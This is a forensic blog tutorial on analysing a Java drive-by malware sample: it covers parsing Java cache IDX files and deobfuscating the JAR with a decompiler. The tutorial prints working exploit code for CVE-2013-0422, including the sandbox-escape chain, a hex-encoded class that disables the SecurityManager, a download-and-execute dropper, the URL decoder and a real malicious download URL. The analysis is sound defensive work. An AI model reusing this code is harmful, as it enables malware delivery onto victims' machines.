DIY Java Malware Analysis

Parts Required: AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another insurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience in Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple How-To blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process, this is basically mine, and it takes the approach of examining the initial downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:

Windows XP: %AppData%\Sun\Java\Deployment\Cache
Windows Vista/7/8: %AppData%\LocalLow\Sun\Java\Deployment\Cache

This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.

Java IDX Files

In my many investigations, I've always relied upon the Java IDX files to backup my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser

At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file at: Java Forensics using TLN Timelines. However, none delved into the binary analysis. Facing a new lifestyle change, and a drastic home move, I found myself with a lot of extra time on my hands for January/February so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on Github to judge interest. At the time I wrote my parser, there were no other parsers on the market.

On a side note, I had hoped for this to be a personal challenge for me to unwind on while moving. Upon posting my initial program I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the file was used as a catalyst for some awesome analysis. I applaud the great effort and documentation made by Mark Woan and Joachim Metz.

In the weeks since the initial release I added numerous features and learned more about the structure. I learned that the file is composed of five distinct "sections", as named by Java:

Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs
Section 3 - Compressed copy of the JAR file's MANIFEST document
Section 4 - Code Signer information, in Java Serialization form
Section 5 - Additional data (Haven't found a file yet with this)

It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The Manifest does give information on what version of Java the applet was compiled with, and for, but is just a duplicate if the JAR is still present on the infected system. Section 4 data typically provided scant details, sometimes just the character "0" or just null bytes, on Java malware I've analyzed. Instead of attempting interpretation on this data, I've just displayed it to the screen for our posterity to unravel.

When put into use on the sample we're analyzing, here are the results shown from my IDX Parser.

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a

Analysis of the infected file system showed activity to a completely different web site, and then a sudden infection. By timelining the events, I found the missing download information from the Java malware in the IDX file, from a domain not found elsewhere on the system.
There are a number of Java IDX parsers out there, which emerged quickly after I first published mine. Many provide good starting ground for getting obvious artifacts from the file, but I do recommend trying them all to see which works best for you.

Java Malware Analysis

With the relevant Java malware file identified, I began the analysis of the file. Typically, many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot appropriately decompile most of the file and ends up disassembling most of it. This means that the analysis isn't done on clean Java code, but instead on Java op-codes. This is certainly possible, and I gave a presentation to the Northern Virginia Hackers group this last year on how to do that, but it's a lot of effort and tiresome. Instead, through a thorough analysis of the current tools available, I've switched to AndroChef for all of my analysis. It still misses some, but decompiles mode code that other tools cannot.

Before going in, VirusTotal reports that this file flagged 2/46 engines for CVE-2013-0422. That gives us a clue of what exploit code to search for.

Using AndroChef on the malware file I was able to retrieve the Java code, which was contained across five separate Class files. These Class files alone are compiled modules, but data can traverse across them, requiring an examiner to analyze all of them simultaneously. For me, the easiest method is to copy and paste them all into one text document, to edit with Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is in use. After a cursory analysis, I try to determine, at a high level, the purpose of each class:

Allaon.class - Contains all of the strings used in the malware
Lizixk - Contains the dropper code
Morny - Contains the text decryption routines
Rvre - Contains an embedded Java class
Zend - Contains the main code

The JAR also contained the standard META-INF/MANIFEST file, which matched the results shown from my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by including the text ""Miria_)d" throughout each string, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");

By performing a simple find/replace, removing excess code, and globally giving descriptive variable names, the following results are then shown:

   public static String FiestaTag = "fiesta"
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader"
   public static String FileURI = "file:///"
   public static String TempDir = "java.io.tmpdir"
   public static String s_hehda_exe = "hehda.exe"
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context"
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor"
   public static String s_findVirtual = "findVirtual"
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader"
   public static String s_defineClass = "defineClass"

This provides a much better clue as to what is going on, especially as the author was a bit constructive in his variable naming and didn't randomize them upon deployment. I can then highlight each variable and find where else in the code that string is being used. I will then continue to find any such obfuscation throughout the code and remove it bits at a time, condensing the code back to what it was originally written as.
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);
         
         JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
         JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
         MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
         Object a = null;
         Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
         Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
         Lookup lolluk = MethodHandles.publicLookup();
         MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
         MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
         MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
         MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
         Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
         MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
         MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
         MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
         MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
         Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
         MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
         MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});
         
         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }

Much of this is straight forward. However, there is a very large block of "MethodType" and "MethodHandle" calls that are a result of the exploit, CVE-2013-0422. More on this exploit is found on Microsoft's Technet site. The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to retrieve an executable, decode it, drop it to %Temp%, and run it. But how can such malicious logic work? A view at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see the first eight bytes as "CAFEBABE":

public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"

This is the magic value, in hex, for compiled Java code. That tells us what we're looking at and that it needs to be converted to hex and saved to a file. Doing so produces another file that we can decompile with AndroChef, producing the following code:

import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}

Wow! Such simple code, but you can see a few items that are glaring. First off, this file was flagged by VirusTotal as 1/46 for Java/Dldr.Pesur.AN. This code really just changes the local security privileges of the parent code, giving it the ability to drop and execute the second-stage malware.

With everything analyzed, we stopped at the function call from Class Lizixk to drop and malware. Now that the exploit was launched, as privileges were escalated, this dropper routine is ran:

public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != "\\") {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}

There are two routines in play here, renamed by me: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the Temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the embedded HTML data for the parameter "fiesta", decodes it with a custom routine to retrieve a URL, then downloads that file to "hehda.exe".

After this, the file is run and the second-stage malware begins. This is standard operating procedure, as the second-stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They just require the use of the first-stage (Black Hole) to get it running on the system.

Custom Data Encoding

I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }

There's a lot of little routines going on here. The encoded data is retrieved from the web site HTML, then put into reverse order. It removes the text instances of "a-nytios" from the data, just like how the Java did with its embedded data. It then retrieves every third byte of the data, discarding the rest. For example:

Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z

Phrase-removed: Rgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z

Every third byte: http://www.badsite.com/evil.exe

One reason I call this out is because there's little reporting on the routine. It's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than guessing your way through it (see "llobapop" ;))

Second-Stage Malware Analysis

The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable is to come from, it relies upon an external source ("fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection. The Java first-stage is the Trojan horse to breach the walls, while hehda.exe is the Greek army hidden within.
Through the infection, we found that the second-stage malware was a variant of the ZeroAccess Rootkit, a pretty nasty piece of work. However, our time has grown long on this post so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how Windows undocumented API calls give it so much power over your computer.

Ghetto Forensics

12 January 2013

Java Malware - Identification and Analysis